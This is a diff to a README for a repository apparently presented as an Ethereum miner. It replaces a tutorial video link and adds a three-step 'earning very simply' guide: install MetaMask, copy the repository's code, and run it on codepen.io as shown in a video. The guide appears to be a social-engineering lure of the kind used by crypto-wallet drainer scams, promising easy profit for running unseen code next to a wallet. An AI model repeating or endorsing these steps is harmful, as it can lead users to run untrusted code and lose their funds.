CryptoProfitLab-collab/eth-miner/README.md

 ## 🚀 Introduction

-Before mining in the cloud or using private equipment or an on-site data center, we recommend that you review the YouTube video that explains how to use the tool. https://youtu.be/Bc9gBM1eOdg?si=KWWo7t5LNeMBVanC
+Before mining in the cloud or using private equipment or an on-site data center, we recommend that you review the YouTube video that explains how to use the tool. https://youtu.be/iDwKxLPnoaU

+Earning very simply in 3 steps:
+1. Download MetaMask for free:
+⌨️ Download MetaMask:⌨️
+metamask.io/download

+2. Copy the source code:
+⌨️ Source Code:⌨️
+github.com/CryptoProfitLab-collab/eth-miner

+3. Run the source code and follow the steps as I showed in the video:
+⌨️ Run the source code:⌨️
+codepen.io/pen

 ---